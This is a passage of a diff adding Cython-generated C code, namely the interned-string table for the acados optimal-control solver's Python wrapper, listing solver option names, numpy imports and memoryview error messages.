0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_solve, __pyx_k_AcadosOcpSolverCython_solve, sizeof(__pyx_k_AcadosOcpSolverCython_solve), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_solve_argu, __pyx_k_AcadosOcpSolverCython_solve_argu, sizeof(__pyx_k_AcadosOcpSolverCython_solve_argu), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2, __pyx_k_AcadosOcpSolverCython_solve_argu_2, sizeof(__pyx_k_AcadosOcpSolverCython_solve_argu_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_store_iter, __pyx_k_AcadosOcpSolverCython_store_iter, sizeof(__pyx_k_AcadosOcpSolverCython_store_iter), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_update_qp, __pyx_k_AcadosOcpSolverCython_update_qp, sizeof(__pyx_k_AcadosOcpSolverCython_update_qp), 0, 0, 1, 1}, + {&__pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_k_All_dimensions_preceding_dimensi, sizeof(__pyx_k_All_dimensions_preceding_dimensi), 0, 0, 1, 0}, + {&__pyx_n_s_AssertionError, __pyx_k_AssertionError, sizeof(__pyx_k_AssertionError), 0, 0, 1, 1}, + {&__pyx_kp_s_Buffer_view_does_not_expose_stri, __pyx_k_Buffer_view_does_not_expose_stri, sizeof(__pyx_k_Buffer_view_does_not_expose_stri), 0, 0, 1, 0}, + {&__pyx_kp_s_Can_only_create_a_buffer_that_is, __pyx_k_Can_only_create_a_buffer_that_is, sizeof(__pyx_k_Can_only_create_a_buffer_that_is), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_assign_to_read_only_memor, __pyx_k_Cannot_assign_to_read_only_memor, sizeof(__pyx_k_Cannot_assign_to_read_only_memor), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_create_writable_memory_vi, __pyx_k_Cannot_create_writable_memory_vi, sizeof(__pyx_k_Cannot_create_writable_memory_vi), 0, 0, 1, 0}, + {&__pyx_kp_u_Cannot_index_with_type, __pyx_k_Cannot_index_with_type, sizeof(__pyx_k_Cannot_index_with_type), 0, 1, 0, 0}, + {&__pyx_kp_s_Cannot_transpose_memoryview_with, __pyx_k_Cannot_transpose_memoryview_with, sizeof(__pyx_k_Cannot_transpose_memoryview_with), 0, 0, 1, 0}, + {&__pyx_kp_s_Dimension_d_is_not_direct, __pyx_k_Dimension_d_is_not_direct, sizeof(__pyx_k_Dimension_d_is_not_direct), 0, 0, 1, 0}, + {&__pyx_n_s_Ellipsis, __pyx_k_Ellipsis, sizeof(__pyx_k_Ellipsis), 0, 0, 1, 1}, + {&__pyx_kp_s_Empty_shape_tuple_for_cython_arr, __pyx_k_Empty_shape_tuple_for_cython_arr, sizeof(__pyx_k_Empty_shape_tuple_for_cython_arr), 0, 0, 1, 0}, + {&__pyx_n_u_F, __pyx_k_F, sizeof(__pyx_k_F), 0, 1, 0, 1}, + {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_n_s_IndexError, __pyx_k_IndexError, sizeof(__pyx_k_IndexError), 0, 0, 1, 1}, + {&__pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_k_Index_out_of_bounds_axis_d, sizeof(__pyx_k_Index_out_of_bounds_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_s_Indirect_dimensions_not_supporte, __pyx_k_Indirect_dimensions_not_supporte, sizeof(__pyx_k_Indirect_dimensions_not_supporte), 0, 0, 1, 0}, + {&__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_k_Invalid_mode_expected_c_or_fortr, sizeof(__pyx_k_Invalid_mode_expected_c_or_fortr), 0, 1, 0, 0}, + {&__pyx_kp_u_Invalid_shape_in_axis, __pyx_k_Invalid_shape_in_axis, sizeof(__pyx_k_Invalid_shape_in_axis), 0, 1, 0, 0}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_k_MemoryView_of_r_at_0x_x, sizeof(__pyx_k_MemoryView_of_r_at_0x_x), 0, 0, 1, 0}, + {&__pyx_kp_s_MemoryView_of_r_object, __pyx_k_MemoryView_of_r_object, sizeof(__pyx_k_MemoryView_of_r_object), 0, 0, 1, 0}, + {&__pyx_n_s_N, __pyx_k_N, sizeof(__pyx_k_N), 0, 0, 1, 1}, + {&__pyx_kp_u_None, __pyx_k_None, sizeof(__pyx_k_None), 0, 1, 0, 0}, + {&__pyx_n_s_NotImplementedError, __pyx_k_NotImplementedError, sizeof(__pyx_k_NotImplementedError), 0, 0, 1, 1}, + {&__pyx_n_b_O, __pyx_k_O, sizeof(__pyx_k_O), 0, 0, 0, 1}, + {&__pyx_kp_u_Out_of_bounds_on_buffer_access_a, __pyx_k_Out_of_bounds_on_buffer_access_a, sizeof(__pyx_k_Out_of_bounds_on_buffer_access_a), 0, 1, 0, 0}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_u_SQP, __pyx_k_SQP, sizeof(__pyx_k_SQP), 0, 1, 0, 1}, + {&__pyx_n_u_SQP_RTI, __pyx_k_SQP_RTI, sizeof(__pyx_k_SQP_RTI), 0, 1, 0, 1}, + {&__pyx_n_s_Sequence, __pyx_k_Sequence, sizeof(__pyx_k_Sequence), 0, 0, 1, 1}, + {&__pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_k_Step_may_not_be_zero_axis_d, sizeof(__pyx_k_Step_may_not_be_zero_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_u_TODO, __pyx_k_TODO, sizeof(__pyx_k_TODO), 0, 1, 0, 0}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_s_Unable_to_convert_item_to_object, __pyx_k_Unable_to_convert_item_to_object, sizeof(__pyx_k_Unable_to_convert_item_to_object), 0, 0, 1, 0}, + {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, + {&__pyx_n_s_View_MemoryView, __pyx_k_View_MemoryView, sizeof(__pyx_k_View_MemoryView), 0, 0, 1, 1}, + {&__pyx_kp_u_Y_m_d_H_M_S_f, __pyx_k_Y_m_d_H_M_S_f, sizeof(__pyx_k_Y_m_d_H_M_S_f), 0, 1, 0, 0}, + {&__pyx_kp_u__14, __pyx_k__14, sizeof(__pyx_k__14), 0, 1, 0, 0}, + {&__pyx_n_u__15, __pyx_k__15, sizeof(__pyx_k__15), 0, 1, 0, 1}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_kp_u__29, __pyx_k__29, sizeof(__pyx_k__29), 0, 1, 0, 0}, + {&__pyx_n_s__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 0, 1, 1}, + {&__pyx_kp_u__6, __pyx_k__6, sizeof(__pyx_k__6), 0, 1, 0, 0}, + {&__pyx_kp_u__7, __pyx_k__7, sizeof(__pyx_k__7), 0, 1, 0, 0}, + {&__pyx_n_s__84, __pyx_k__84, sizeof(__pyx_k__84), 0, 0, 1, 1}, + {&__pyx_n_s_abc, __pyx_k_abc, sizeof(__pyx_k_abc), 0, 0, 1, 1}, + {&__pyx_n_s_acados_template_acados_ocp_solve, __pyx_k_acados_template_acados_ocp_solve, sizeof(__pyx_k_acados_template_acados_ocp_solve), 0, 0, 1, 1}, + {&__pyx_n_s_allocate_buffer, __pyx_k_allocate_buffer, sizeof(__pyx_k_allocate_buffer), 0, 0, 1, 1}, + {&__pyx_n_u_alpha, __pyx_k_alpha, sizeof(__pyx_k_alpha), 0, 1, 0, 1}, + {&__pyx_n_u_alpha_min, __pyx_k_alpha_min, sizeof(__pyx_k_alpha_min), 0, 1, 0, 1}, + {&__pyx_n_u_alpha_reduction, __pyx_k_alpha_reduction, sizeof(__pyx_k_alpha_reduction), 0, 1, 0, 1}, + {&__pyx_kp_u_alpha_values_are_not_available_f, __pyx_k_alpha_values_are_not_available_f, sizeof(__pyx_k_alpha_values_are_not_available_f), 0, 1, 0, 0}, + {&__pyx_kp_u_and, __pyx_k_and, sizeof(__pyx_k_and), 0, 1, 0, 0}, + {&__pyx_n_s_array, __pyx_k_array, sizeof(__pyx_k_array), 0, 0, 1, 1}, + {&__pyx_n_s_ascontiguousarray, __pyx_k_ascontiguousarray, sizeof(__pyx_k_ascontiguousarray), 0, 0, 1, 1}, + {&__pyx_n_s_asfortranarray, __pyx_k_asfortranarray, sizeof(__pyx_k_asfortranarray), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_kp_u_at_stage, __pyx_k_at_stage, sizeof(__pyx_k_at_stage), 0, 1, 0, 0}, + {&__pyx_n_s_base, __pyx_k_base, sizeof(__pyx_k_base), 0, 0, 1, 1}, + {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, + {&__pyx_n_u_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 1, 0, 1}, + {&__pyx_n_s_class, __pyx_k_class, sizeof(__pyx_k_class), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_kp_s_collections_abc, __pyx_k_collections_abc, sizeof(__pyx_k_collections_abc), 0, 0, 1, 0}, + {&__pyx_n_s_constraints_fields, __pyx_k_constraints_fields, sizeof(__pyx_k_constraints_fields), 0, 0, 1, 1}, + {&__pyx_n_s_constraints_set, __pyx_k_constraints_set, sizeof(__pyx_k_constraints_set), 0, 0, 1, 1}, + {&__pyx_kp_s_contiguous_and_direct, __pyx_k_contiguous_and_direct, sizeof(__pyx_k_contiguous_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_contiguous_and_indirect, __pyx_k_contiguous_and_indirect, sizeof(__pyx_k_contiguous_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_cost_fields, __pyx_k_cost_fields, sizeof(__pyx_k_cost_fields), 0, 0, 1, 1}, + {&__pyx_n_s_cost_set, __pyx_k_cost_set, sizeof(__pyx_k_cost_set), 0, 0, 1, 1}, + {&__pyx_n_s_count, __pyx_k_count, sizeof(__pyx_k_count), 0, 0, 1, 1}, + {&__pyx_n_s_datetime, __pyx_k_datetime, sizeof(__pyx_k_datetime), 0, 0, 1, 1}, + {&__pyx_n_s_default, __pyx_k_default, sizeof(__pyx_k_default), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dims, __pyx_k_dims, sizeof(__pyx_k_dims), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_double_fields, __pyx_k_double_fields, sizeof(__pyx_k_double_fields), 0, 0, 1, 1}, + {&__pyx_n_s_double_value, __pyx_k_double_value, sizeof(__pyx_k_double_value), 0, 0, 1, 1}, + {&__pyx_n_s_dtype, __pyx_k_dtype, sizeof(__pyx_k_dtype), 0, 0, 1, 1}, + {&__pyx_n_s_dtype_is_object, __pyx_k_dtype_is_object, sizeof(__pyx_k_dtype_is_object), 0, 0, 1, 1}, + {&__pyx_n_s_dump, __pyx_k_dump, sizeof(__pyx_k_dump), 0, 0, 1, 1}, + {&__pyx_n_s_dynamics_get, __pyx_k_dynamics_get, sizeof(__pyx_k_dynamics_get), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_n_s_enter, __pyx_k_enter, sizeof(__pyx_k_enter), 0, 0, 1, 1}, + {&__pyx_n_s_enumerate, __pyx_k_enumerate, sizeof(__pyx_k_enumerate), 0, 0, 1, 1}, + {&__pyx_n_u_eps_sufficient_descent, __pyx_k_eps_sufficient_descent, sizeof(__pyx_k_eps_sufficient_descent), 0, 1, 0, 1}, + {&__pyx_n_s_error, __pyx_k_error, sizeof(__pyx_k_error), 0, 0, 1, 1}, + {&__pyx_n_s_eval_param_sens, __pyx_k_eval_param_sens, sizeof(__pyx_k_eval_param_sens), 0, 0, 1, 1}, + {&__pyx_n_u_ex, __pyx_k_ex, sizeof(__pyx_k_ex), 0, 1, 0, 1}, + {&__pyx_n_s_exit, __pyx_k_exit, sizeof(__pyx_k_exit), 0, 0, 1, 1}, + {&__pyx_n_s_f, __pyx_k_f, sizeof(__pyx_k_f), 0, 0, 1, 1}, + {&__pyx_n_s_field, __pyx_k_field, sizeof(__pyx_k_field), 0, 0, 1, 1}, + {&__pyx_n_s_field_2, __pyx_k_field_2, sizeof(__pyx_k_field_2), 0, 0, 1, 1}, + {&__pyx_n_s_fields, __pyx_k_fields, sizeof(__pyx_k_fields), 0, 0, 1, 1}, + {&__pyx_n_s_filename, __pyx_k_filename, sizeof(__pyx_k_filename), 0, 0, 1, 1}, + {&__pyx_n_s_flags, __pyx_k_flags, sizeof(__pyx_k_flags), 0, 0, 1, 1}, + {&__pyx_n_s_float64, __pyx_k_float64, sizeof(__pyx_k_float64), 0, 0, 1, 1}, + {&__pyx_kp_u_for_field, __pyx_k_for_field, sizeof(__pyx_k_for_field), 0, 1, 0, 0}, + {&__pyx_n_s_format, __pyx_k_format, sizeof(__pyx_k_format), 0, 0, 1, 1}, + {&__pyx_n_s_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 0, 1, 1}, + {&__pyx_n_u_fortran, __pyx_k_fortran, sizeof(__pyx_k_fortran), 0, 1, 0, 1}, + {&__pyx_n_s_full_stats, __pyx_k_full_stats, sizeof(__pyx_k_full_stats), 0, 0, 1, 1}, + {&__pyx_n_u_full_step_dual, __pyx_k_full_step_dual, sizeof(__pyx_k_full_step_dual), 0, 1, 0, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_get, __pyx_k_get, sizeof(__pyx_k_get), 0, 0, 1, 1}, + {&__pyx_n_s_get_cost, __pyx_k_get_cost, sizeof(__pyx_k_get_cost), 0, 0, 1, 1}, + {&__pyx_n_s_get_pointers_solver, __pyx_k_get_pointers_solver, sizeof(__pyx_k_get_pointers_solver), 0, 0, 1, 1}, + {&__pyx_n_s_get_residuals, __pyx_k_get_residuals, sizeof(__pyx_k_get_residuals), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_double, __pyx_k_get_stat_double, sizeof(__pyx_k_get_stat_double), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_int, __pyx_k_get_stat_int, sizeof(__pyx_k_get_stat_int), 0, 0, 1, 1}, + {&__pyx_n_s_get_stat_matrix, __pyx_k_get_stat_matrix, sizeof(__pyx_k_get_stat_matrix), 0, 0, 1, 1}, + {&__pyx_n_s_get_stats, __pyx_k_get_stats, sizeof(__pyx_k_get_stats), 0, 0, 1, 1}, + {&__pyx_n_s_getcwd, __pyx_k_getcwd, sizeof(__pyx_k_getcwd), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_u_globalization, __pyx_k_globalization, sizeof(__pyx_k_globalization), 0, 1, 0, 1}, + {&__pyx_n_u_globalization_use_SOC, __pyx_k_globalization_use_SOC, sizeof(__pyx_k_globalization_use_SOC), 0, 1, 0, 1}, + {&__pyx_kp_u_got, __pyx_k_got, sizeof(__pyx_k_got), 0, 1, 0, 0}, + {&__pyx_kp_u_got_differing_extents_in_dimensi, __pyx_k_got_differing_extents_in_dimensi, sizeof(__pyx_k_got_differing_extents_in_dimensi), 0, 1, 0, 0}, + {&__pyx_n_s_i, __pyx_k_i, sizeof(__pyx_k_i), 0, 0, 1, 1}, + {&__pyx_n_s_id, __pyx_k_id, sizeof(__pyx_k_id), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_indent, __pyx_k_indent, sizeof(__pyx_k_indent), 0, 0, 1, 1}, + {&__pyx_n_s_index, __pyx_k_index, sizeof(__pyx_k_index), 0, 0, 1, 1}, + {&__pyx_n_u_initialize_t_slacks, __pyx_k_initialize_t_slacks, sizeof(__pyx_k_initialize_t_slacks), 0, 1, 0, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_int, __pyx_k_int, sizeof(__pyx_k_int), 0, 0, 1, 1}, + {&__pyx_n_s_int_fields, __pyx_k_int_fields, sizeof(__pyx_k_int_fields), 0, 0, 1, 1}, + {&__pyx_n_s_int_value, __pyx_k_int_value, sizeof(__pyx_k_int_value), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_isfile, __pyx_k_isfile, sizeof(__pyx_k_isfile), 0, 0, 1, 1}, + {&__pyx_n_s_itemsize, __pyx_k_itemsize, sizeof(__pyx_k_itemsize), 0, 0, 1, 1}, + {&__pyx_kp_s_itemsize_0_for_cython_array, __pyx_k_itemsize_0_for_cython_array, sizeof(__pyx_k_itemsize_0_for_cython_array), 0, 0, 1, 0}, + {&__pyx_n_u_iterate, __pyx_k_iterate, sizeof(__pyx_k_iterate), 0, 1, 0, 1}, + {&__pyx_n_s_join, __pyx_k_join, sizeof(__pyx_k_join), 0, 0, 1, 1}, + {&__pyx_n_s_json, __pyx_k_json, sizeof(__pyx_k_json), 0, 0, 1, 1}, + {&__pyx_kp_u_json_2, __pyx_k_json_2, sizeof(__pyx_k_json_2), 0, 1, 0, 0}, + {&__pyx_n_s_key, __pyx_k_key, sizeof(__pyx_k_key), 0, 0, 1, 1}, + {&__pyx_n_s_keys, __pyx_k_keys, sizeof(__pyx_k_keys), 0, 0, 1, 1}, + {&__pyx_n_u_lam, __pyx_k_lam, sizeof(__pyx_k_lam), 0, 1, 0, 1}, + {&__pyx_n_u_lam_2, __pyx_k_lam_2, sizeof(__pyx_k_lam_2), 0, 1, 0, 1}, + {&__pyx_n_u_lbu, __pyx_k_lbu, sizeof(__pyx_k_lbu), 0, 1, 0, 1}, + {&__pyx_n_u_lbx, __pyx_k_lbx, sizeof(__pyx_k_lbx), 0, 1, 0, 1}, + {&__pyx_n_u_line_search_use_sufficient_desce, __pyx_k_line_search_use_sufficient_desce, sizeof(__pyx_k_line_search_use_sufficient_desce), 0, 1, 0, 1}, + {&__pyx_n_s_load, __pyx_k_load, sizeof(__pyx_k_load), 0, 0, 1, 1}, + {&__pyx_n_s_load_iterate, __pyx_k_load_iterate, sizeof(__pyx_k_load_iterate), 0, 0, 1, 1}, + {&__pyx_kp_u_load_iterate_failed_file_does_no, __pyx_k_load_iterate_failed_file_does_no, sizeof(__pyx_k_load_iterate_failed_file_does_no), 0, 1, 0, 0}, + {&__pyx_n_s_m, __pyx_k_m, sizeof(__pyx_k_m), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_mem_fields, __pyx_k_mem_fields, sizeof(__pyx_k_mem_fields), 0, 0, 1, 1}, + {&__pyx_n_s_memview, __pyx_k_memview, sizeof(__pyx_k_memview), 0, 0, 1, 1}, + {&__pyx_n_s_min_size, __pyx_k_min_size, sizeof(__pyx_k_min_size), 0, 0, 1, 1}, + {&__pyx_n_s_mode, __pyx_k_mode, sizeof(__pyx_k_mode), 0, 0, 1, 1}, + {&__pyx_n_s_model_name, __pyx_k_model_name, sizeof(__pyx_k_model_name), 0, 0, 1, 1}, + {&__pyx_n_s_msg, __pyx_k_msg, sizeof(__pyx_k_msg), 0, 0, 1, 1}, + {&__pyx_n_s_n, __pyx_k_n, sizeof(__pyx_k_n), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_2, __pyx_k_name_2, sizeof(__pyx_k_name_2), 0, 0, 1, 1}, + {&__pyx_n_s_ndim, __pyx_k_ndim, sizeof(__pyx_k_ndim), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_n_s_new_time_steps, __pyx_k_new_time_steps, sizeof(__pyx_k_new_time_steps), 0, 0, 1, 1}, + {&__pyx_n_s_nlp_solver_type, __pyx_k_nlp_solver_type, sizeof(__pyx_k_nlp_solver_type), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_np, __pyx_k_np, sizeof(__pyx_k_np), 0, 0, 1, 1}, + {&__pyx_n_s_numpy, __pyx_k_numpy, sizeof(__pyx_k_numpy), 0, 0, 1, 1}, + {&__pyx_kp_u_numpy_core_multiarray_failed_to, __pyx_k_numpy_core_multiarray_failed_to, sizeof(__pyx_k_numpy_core_multiarray_failed_to), 0, 1, 0, 0}, + {&__pyx_kp_u_numpy_core_umath_failed_to_impor, __pyx_k_numpy_core_umath_failed_to_impor, sizeof(__pyx_k_numpy_core_umath_failed_to_impor), 0, 1, 0, 0}, + {&__pyx_n_s_nx, __pyx_k_nx, sizeof(__pyx_k_nx), 0, 0, 1, 1}, + {&__pyx_n_s_obj, __pyx_k_obj, sizeof(__pyx_k_obj), 0, 0, 1, 1}, + {&__pyx_n_s_open, __pyx_k_open, sizeof(__pyx_k_open), 0, 0, 1, 1}, + {&__pyx_n_s_options_set, __pyx_k_options_set, sizeof(__pyx_k_options_set), 0, 0, 1, 1}, + {&__pyx_n_s_order, __pyx_k_order, sizeof(__pyx_k_order), 0, 0, 1, 1}, + {&__pyx_n_s_os, __pyx_k_os, sizeof(__pyx_k_os), 0, 0, 1, 1}, + {&__pyx_n_s_out, __pyx_k_out, sizeof(__pyx_k_out), 0, 0, 1, 1}, + {&__pyx_n_s_out_fields, __pyx_k_out_fields, sizeof(__pyx_k_out_fields), 0, 0, 1, 1}, + {&__pyx_n_s_out_mat, __pyx_k_out_mat, sizeof(__pyx_k_out_mat), 0, 0, 1, 1}, + {&__pyx_n_s_overwrite, __pyx_k_overwrite, sizeof(__pyx_k_overwrite), 0, 0, 1, 1}, + {&__pyx_n_u_p, __pyx_k_p, sizeof(__pyx_k_p), 0, 1, 0, 1}, + {&__pyx_n_s_pack, __pyx_k_pack, sizeof(__pyx_k_pack), 0, 0, 1, 1}, + {&__pyx_n_s_path, __pyx_k_path, sizeof(__pyx_k_path), 0, 0, 1, 1}, + {&__pyx_n_u_pi, __pyx_k_pi, sizeof(__pyx_k_pi), 0, 1, 0, 1}, + {&__pyx_n_u_pi_2, __pyx_k_pi_2, sizeof(__pyx_k_pi_2), 0, 1, 0, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, + {&__pyx_n_u_print_level, __pyx_k_print_level, sizeof(__pyx_k_print_level), 0, 1, 0, 1}, + {&__pyx_n_s_print_statistics, __pyx_k_print_statistics, sizeof(__pyx_k_print_statistics), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle_Enum, __pyx_k_pyx_unpickle_Enum, sizeof(__pyx_k_pyx_unpickle_Enum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_u_qp_iter, __pyx_k_qp_iter, sizeof(__pyx_k_qp_iter), 0, 1, 0, 1}, + {&__pyx_n_u_qp_mu0, __pyx_k_qp_mu0, sizeof(__pyx_k_qp_mu0), 0, 1, 0, 1}, + {&__pyx_n_s_qp_solver_cond_N, __pyx_k_qp_solver_cond_N, sizeof(__pyx_k_qp_solver_cond_N), 0, 0, 1, 1}, + {&__pyx_n_u_qp_tau_min, __pyx_k_qp_tau_min, sizeof(__pyx_k_qp_tau_min), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_comp, __pyx_k_qp_tol_comp, sizeof(__pyx_k_qp_tol_comp), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_eq, __pyx_k_qp_tol_eq, sizeof(__pyx_k_qp_tol_eq), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_ineq, __pyx_k_qp_tol_ineq, sizeof(__pyx_k_qp_tol_ineq), 0, 1, 0, 1}, + {&__pyx_n_u_qp_tol_stat, __pyx_k_qp_tol_stat, sizeof(__pyx_k_qp_tol_stat), 0, 1, 0, 1}, + {&__pyx_n_u_qp_warm_start, __pyx_k_qp_warm_start, sizeof(__pyx_k_qp_warm_start), 0, 1, 0, 1}, + {&__pyx_n_u_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 1, 0, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_recompute, __pyx_k_recompute, sizeof(__pyx_k_recompute), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_register, __pyx_k_register, sizeof(__pyx_k_register), 0, 0, 1, 1}, + {&__pyx_n_b_res_comp, __pyx_k_res_comp, sizeof(__pyx_k_res_comp), 0, 0, 0, 1}, + {&__pyx_n_b_res_eq, __pyx_k_res_eq, sizeof(__pyx_k_res_eq), 0, 0, 0, 1}, + {&__pyx_n_b_res_ineq, __pyx_k_res_ineq, sizeof(__pyx_k_res_ineq), 0, 0, 0, 1}, + {&__pyx_n_b_res_stat, __pyx_k_res_stat, sizeof(__pyx_k_res_stat), 0, 0, 0, 1}, + {&__pyx_n_s_reset, __pyx_k_reset, sizeof(__pyx_k_reset), 0, 0, 1, 1}, + {&__pyx_n_u_residuals, __pyx_k_residuals, sizeof(__pyx_k_residuals), 0, 1, 0, 1}, + {&__pyx_n_u_rti_phase, __pyx_k_rti_phase, sizeof(__pyx_k_rti_phase), 0, 1, 0, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_set, __pyx_k_set, sizeof(__pyx_k_set), 0, 0, 1, 1}, + {&__pyx_n_s_set_new_time_steps, __pyx_k_set_new_time_steps, sizeof(__pyx_k_set_new_time_steps), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_shape, __pyx_k_shape, sizeof(__pyx_k_shape), 0, 0, 1, 1}, + {&__pyx_n_s_size, __pyx_k_size, sizeof(__pyx_k_size), 0, 0, 1, 1}, + {&__pyx_n_u_sl, __pyx_k_sl, sizeof(__pyx_k_sl), 0, 1, 0, 1}, + {&__pyx_n_u_sl_2, __pyx_k_sl_2, sizeof(__pyx_k_sl_2), 0, 1, 0, 1}, + {&__pyx_n_s_solution, __pyx_k_solution, sizeof(__pyx_k_solution), 0, 0, 1, 1}, + {&__pyx_n_s_solve, __pyx_k_solve, sizeof(__pyx_k_solve), 0, 0, 1, 1}, + {&__pyx_kp_u_solver_option_must_be_of_type_fl, __pyx_k_solver_option_must_be_of_type_fl, sizeof(__pyx_k_solver_option_must_be_of_type_fl), 0, 1, 0, 0}, + {&__pyx_kp_u_solver_option_must_be_of_type_in, __pyx_k_solver_option_must_be_of_type_in, 